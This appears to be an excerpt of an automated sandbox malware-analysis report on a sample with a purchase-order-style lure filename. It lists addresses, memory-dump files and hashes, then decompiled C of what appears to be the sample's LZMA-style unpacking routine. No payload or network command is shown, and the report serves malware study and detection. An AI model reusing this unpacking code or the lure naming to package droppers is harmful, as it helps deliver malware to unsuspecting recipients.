                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x0040673a
                                                                                                                          0x0040673a
                                                                                                                          0x0040673d
                                                                                                                          0x00406744
                                                                                                                          0x00406749
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067d7
                                                                                                                          0x004067d7
                                                                                                                          0x004067db
                                                                                                                          0x00406b79
                                                                                                                          0x00000000
                                                                                                                          0x00406b79
                                                                                                                          0x004067e1
                                                                                                                          0x004067e4
                                                                                                                          0x004067e7
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f4
                                                                                                                          0x004067f6
                                                                                                                          0x004067f6
                                                                                                                          0x004067f6
                                                                                                                          0x004067f9
                                                                                                                          0x004067fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063cc
                                                                                                                          0x004063cc
                                                                                                                          0x004063d0
                                                                                                                          0x00406b3d
                                                                                                                          0x00000000
                                                                                                                          0x00406b3d
                                                                                                                          0x004063d6
                                                                                                                          0x004063d9
                                                                                                                          0x004063dc
                                                                                                                          0x004063e0
                                                                                                                          0x004063e3
                                                                                                                          0x004063e9
                                                                                                                          0x004063eb
                                                                                                                          0x004063eb
                                                                                                                          0x004063eb
                                                                                                                          0x004063ee
                                                                                                                          0x004063f1
                                                                                                                          0x004063f1
                                                                                                                          0x004063f4
                                                                                                                          0x004063f7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063fd
                                                                                                                          0x00406403
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406409
                                                                                                                          0x00406409
                                                                                                                          0x0040640d
                                                                                                                          0x00406410
                                                                                                                          0x00406413
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641d
                                                                                                                          0x0040641f
                                                                                                                          0x00406425
                                                                                                                          0x00406428
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00406431
                                                                                                                          0x00406434
                                                                                                                          0x00406437
                                                                                                                          0x00406453
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645c
                                                                                                                          0x00406463
                                                                                                                          0x00406467
                                                                                                                          0x00406469
                                                                                                                          0x0040646d
                                                                                                                          0x00406439
                                                                                                                          0x00406439
                                                                                                                          0x0040643d
                                                                                                                          0x00406445
                                                                                                                          0x0040644a
                                                                                                                          0x0040644c
                                                                                                                          0x0040644e
                                                                                                                          0x0040644e
                                                                                                                          0x00406470
                                                                                                                          0x00406477
                                                                                                                          0x0040647a
                                                                                                                          0x00000000
                                                                                                                          0x00406480
                                                                                                                          0x00000000
                                                                                                                          0x00406480
                                                                                                                          0x00000000
                                                                                                                          0x00406485
                                                                                                                          0x00406485
                                                                                                                          0x00406489
                                                                                                                          0x00406b49
                                                                                                                          0x00000000
                                                                                                                          0x00406b49
                                                                                                                          0x0040648f
                                                                                                                          0x00406492
                                                                                                                          0x00406495
                                                                                                                          0x00406499
                                                                                                                          0x0040649c
                                                                                                                          0x004064a2
                                                                                                                          0x004064a4
                                                                                                                          0x004064a4
                                                                                                                          0x004064a4
                                                                                                                          0x004064a7
                                                                                                                          0x004064aa
                                                                                                                          0x004064aa
                                                                                                                          0x004064aa
                                                                                                                          0x004064b0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064b2
                                                                                                                          0x004064b5
                                                                                                                          0x004064b8
                                                                                                                          0x004064bb
                                                                                                                          0x004064be
                                                                                                                          0x004064c1
                                                                                                                          0x004064c4
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064cd
                                                                                                                          0x004064d0
                                                                                                                          0x004064e8
                                                                                                                          0x004064eb
                                                                                                                          0x004064ee
                                                                                                                          0x004064f1
                                                                                                                          0x004064f1
                                                                                                                          0x004064f4
                                                                                                                          0x004064f8
                                                                                                                          0x004064fa
                                                                                                                          0x004064d2
                                                                                                                          0x004064d2
                                                                                                                          0x004064da
                                                                                                                          0x004064df
                                                                                                                          0x004064e1
                                                                                                                          0x004064e3
                                                                                                                          0x004064e3
                                                                                                                          0x004064fd
                                                                                                                          0x00406504
                                                                                                                          0x00406507
                                                                                                                          0x00000000
                                                                                                                          0x00406509
                                                                                                                          0x00000000
                                                                                                                          0x00406509
                                                                                                                          0x00406507
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406549
                                                                                                                          0x00406549
                                                                                                                          0x0040654d
                                                                                                                          0x00406b55
                                                                                                                          0x00000000
                                                                                                                          0x00406b55
                                                                                                                          0x00406553
                                                                                                                          0x00406556
                                                                                                                          0x00406559
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406566
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406574
                                                                                                                          0x00406512
                                                                                                                          0x00406512
                                                                                                                          0x00406515
                                                                                                                          0x00000000
                                                                                                                          0x00406515
                                                                                                                          0x00406576
                                                                                                                          0x00406576
                                                                                                                          0x00406579
                                                                                                                          0x0040657c
                                                                                                                          0x0040657f
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00406588
                                                                                                                          0x0040658b
                                                                                                                          0x0040658e
                                                                                                                          0x00406591
                                                                                                                          0x00406594
                                                                                                                          0x004065ac
                                                                                                                          0x004065af
                                                                                                                          0x004065b2
                                                                                                                          0x004065b5
                                                                                                                          0x004065b5
                                                                                                                          0x004065b8
                                                                                                                          0x004065bc
                                                                                                                          0x004065be
                                                                                                                          0x00406596
                                                                                                                          0x00406596
                                                                                                                          0x0040659e
                                                                                                                          0x004065a3
                                                                                                                          0x004065a5
                                                                                                                          0x004065a7
                                                                                                                          0x004065a7
                                                                                                                          0x004065c1
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x0040685a
                                                                                                                          0x0040685e
                                                                                                                          0x00406b85
                                                                                                                          0x00000000
                                                                                                                          0x00406b85
                                                                                                                          0x00406864
                                                                                                                          0x00406867
                                                                                                                          0x0040686a
                                                                                                                          0x0040686e
                                                                                                                          0x00406871
                                                                                                                          0x00406877
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x0040687c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040662a
                                                                                                                          0x0040662a
                                                                                                                          0x0040662d
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a26
                                                                                                                          0x00406a2a
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a4f
                                                                                                                          0x00406a56
                                                                                                                          0x00000000
                                                                                                                          0x00406a56
                                                                                                                          0x00406a2c
                                                                                                                          0x00406a2f
                                                                                                                          0x00406a32
                                                                                                                          0x00406a35
                                                                                                                          0x00406a3c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406b17
                                                                                                                          0x00406b1a
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406751
                                                                                                                          0x00406753
                                                                                                                          0x0040675a
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406768
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406772
                                                                                                                          0x00406772
                                                                                                                          0x00406773
                                                                                                                          0x00406776
                                                                                                                          0x0040677d
                                                                                                                          0x00406780
                                                                                                                          0x0040678e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a73
                                                                                                                          0x00406a73
                                                                                                                          0x00406a77
                                                                                                                          0x00406baf
                                                                                                                          0x00000000
                                                                                                                          0x00406baf
                                                                                                                          0x00406a7d
                                                                                                                          0x00406a80
                                                                                                                          0x00406a83
                                                                                                                          0x00406a87
                                                                                                                          0x00406a8a
                                                                                                                          0x00406a90
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a95
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406796
                                                                                                                          0x00406799
                                                                                                                          0x004067cf
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x00406902
                                                                                                                          0x00406902
                                                                                                                          0x00406905
                                                                                                                          0x00406907
                                                                                                                          0x00406b91
                                                                                                                          0x00000000
                                                                                                                          0x00406b91
                                                                                                                          0x0040690d
                                                                                                                          0x00406910
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406916
                                                                                                                          0x0040691a
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x00000000
                                                                                                                          0x0040691d
                                                                                                                          0x0040679b
                                                                                                                          0x0040679d
                                                                                                                          0x0040679f
                                                                                                                          0x004067a1
                                                                                                                          0x004067a4
                                                                                                                          0x004067a5
                                                                                                                          0x004067a7
                                                                                                                          0x004067a9
                                                                                                                          0x004067ac
                                                                                                                          0x004067af
                                                                                                                          0x004067c5
                                                                                                                          0x004067ca
                                                                                                                          0x00406802
                                                                                                                          0x00406802
                                                                                                                          0x00406806
                                                                                                                          0x00406832
                                                                                                                          0x00406834
                                                                                                                          0x0040683b
                                                                                                                          0x0040683e
                                                                                                                          0x00406841
                                                                                                                          0x00406841
                                                                                                                          0x00406846
                                                                                                                          0x00406846
                                                                                                                          0x00406848
                                                                                                                          0x0040684b
                                                                                                                          0x00406852
                                                                                                                          0x00406855
                                                                                                                          0x00406882
                                                                                                                          0x00406882
                                                                                                                          0x00406885
                                                                                                                          0x00406888
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x00000000
                                                                                                                          0x004068fc
                                                                                                                          0x0040688a
                                                                                                                          0x00406890
                                                                                                                          0x00406893
                                                                                                                          0x00406896
                                                                                                                          0x00406899
                                                                                                                          0x0040689c
                                                                                                                          0x0040689f
                                                                                                                          0x004068a2
                                                                                                                          0x004068a5
                                                                                                                          0x004068a8
                                                                                                                          0x004068ab
                                                                                                                          0x004068c4
                                                                                                                          0x004068c6
                                                                                                                          0x004068c9
                                                                                                                          0x004068ca
                                                                                                                          0x004068cd
                                                                                                                          0x004068cf
                                                                                                                          0x004068d2
                                                                                                                          0x004068d4
                                                                                                                          0x004068d6
                                                                                                                          0x004068d9
                                                                                                                          0x004068db
                                                                                                                          0x004068de
                                                                                                                          0x004068e2
                                                                                                                          0x004068e4
                                                                                                                          0x004068e4
                                                                                                                          0x004068e5
                                                                                                                          0x004068e8
                                                                                                                          0x004068eb
                                                                                                                          0x004068ad
                                                                                                                          0x004068ad
                                                                                                                          0x004068b5
                                                                                                                          0x004068ba
                                                                                                                          0x004068bc
                                                                                                                          0x004068bf
                                                                                                                          0x004068bf
                                                                                                                          0x004068ee
                                                                                                                          0x004068f5
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x004068f5
                                                                                                                          0x00406808
                                                                                                                          0x0040680b
                                                                                                                          0x0040680d
                                                                                                                          0x00406810
                                                                                                                          0x00406813
                                                                                                                          0x00406816
                                                                                                                          0x00406818
                                                                                                                          0x0040681b
                                                                                                                          0x0040681e
                                                                                                                          0x0040681e
                                                                                                                          0x00406821
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x0040682b
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x0040682b
                                                                                                                          0x004067b1
                                                                                                                          0x004067b4
                                                                                                                          0x004067b6
                                                                                                                          0x004067b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406518
                                                                                                                          0x00406518
                                                                                                                          0x0040651c
                                                                                                                          0x00406b61
                                                                                                                          0x00000000
                                                                                                                          0x00406b61
                                                                                                                          0x00406522
                                                                                                                          0x00406525
                                                                                                                          0x00406528
                                                                                                                          0x0040652b
                                                                                                                          0x0040652e
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406536
                                                                                                                          0x00406539
                                                                                                                          0x0040653c
                                                                                                                          0x0040653f
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x00406b6d
                                                                                                                          0x00000000
                                                                                                                          0x00406b6d
                                                                                                                          0x004066ad
                                                                                                                          0x004066b0
                                                                                                                          0x004066b3
                                                                                                                          0x004066b6
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066bb
                                                                                                                          0x004066be
                                                                                                                          0x004066c1
                                                                                                                          0x004066c4
                                                                                                                          0x004066c7
                                                                                                                          0x004066ca
                                                                                                                          0x004066cb
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066d0
                                                                                                                          0x004066d3
                                                                                                                          0x004066d6
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066de
                                                                                                                          0x004066de
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406924
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040692a
                                                                                                                          0x0040692d
                                                                                                                          0x00406930
                                                                                                                          0x00406933
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406938
                                                                                                                          0x0040693b
                                                                                                                          0x0040693e
                                                                                                                          0x00406941
                                                                                                                          0x00406944
                                                                                                                          0x00406947
                                                                                                                          0x00406948
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694d
                                                                                                                          0x00406950
                                                                                                                          0x00406953
                                                                                                                          0x00406956
                                                                                                                          0x00406959
                                                                                                                          0x0040695d
                                                                                                                          0x0040695f
                                                                                                                          0x00406962
                                                                                                                          0x00000000
                                                                                                                          0x00406964
                                                                                                                          0x004066e1
                                                                                                                          0x004066e1
                                                                                                                          0x00000000
                                                                                                                          0x004066e1
                                                                                                                          0x00406962
                                                                                                                          0x00406b97
                                                                                                                          0x00406bb9
                                                                                                                          0x00406bbf
                                                                                                                          0x00406bc1
                                                                                                                          0x00406bc8
                                                                                                                          0x00406bca
                                                                                                                          0x00406bd1
                                                                                                                          0x00406bd5
                                                                                                                          0x00000000
                                                                                                                          0x004061c6
                                                                                                                          0x00406bce
                                                                                                                          0x00406bce
                                                                                                                          0x00000000
                                                                                                                          0x00406bce
                                                                                                                          0x00406a1b
                                                                                                                          0x00406aa1
                                                                                                                          0x00406aa7
                                                                                                                          0x00406aaa
                                                                                                                          0x00406aad
                                                                                                                          0x00406ab0
                                                                                                                          0x00406ab3
                                                                                                                          0x00406ab6
                                                                                                                          0x00406ab9
                                                                                                                          0x00406abc
                                                                                                                          0x00406ac2
                                                                                                                          0x00406adb
                                                                                                                          0x00406ade
                                                                                                                          0x00406ae1
                                                                                                                          0x00406ae4
                                                                                                                          0x00406ae8
                                                                                                                          0x00406aea
                                                                                                                          0x00406aeb
                                                                                                                          0x00406aee
                                                                                                                          0x00406ac4
                                                                                                                          0x00406ac4
                                                                                                                          0x00406acc
                                                                                                                          0x00406ad1
                                                                                                                          0x00406ad3
                                                                                                                          0x00406ad6
                                                                                                                          0x00406ad6
                                                                                                                          0x00406af8
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00406af8
                                                                                                                          0x00000000
                                                                                                                          0x0040696d

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
                                                                                                                          • Instruction ID: f8b3e10e58f717f8edde5794a38fefd32bea2d44dd320be9cbeb21c60fb05cda
                                                                                                                          • Opcode Fuzzy Hash: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
                                                                                                                          • Instruction Fuzzy Hash: F5913270E00229CBDF28DF98C8547ADBBB1FB45305F15816ED816BB281C778AA96DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040667F Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E0040667F() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406BD6))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
